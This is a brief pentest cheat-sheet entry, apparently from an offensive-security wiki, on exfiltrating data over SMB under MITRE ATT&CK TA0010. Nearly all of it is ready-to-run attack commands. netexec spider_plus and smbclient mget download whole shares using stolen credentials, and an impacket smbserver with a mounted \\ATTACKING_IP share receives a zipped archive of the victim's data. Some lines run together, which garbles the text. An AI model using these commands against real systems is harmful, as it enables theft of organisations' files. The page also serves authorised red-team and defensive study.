Exfiltration Over SMB
MITRE ATT&CK™ - Exfiltration - Tactic TA0010
Theory
Practice
Exfiltrate Share's Content
netexec smb $IP -u $USERNAME -p $PASSWORD -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=999999cat 10.10.10.111.json | jq '. | map_values(keys)'# In an smbclient interactive session
recurse ON
prompt OFF
mget *Exfiltrate Data
smbserver.py -smb2support /local/share/path ShareName -user veresk -password psswdCompress-Archive -Path /path/to/compress -DestinationPath exfi.zip# Mount the smb share
net use Z: \\ATTACKING_IP\ShareName psswd /USER:veresk
# Exfiltrate ZIP file
copy exfi.zip Z:\Last updated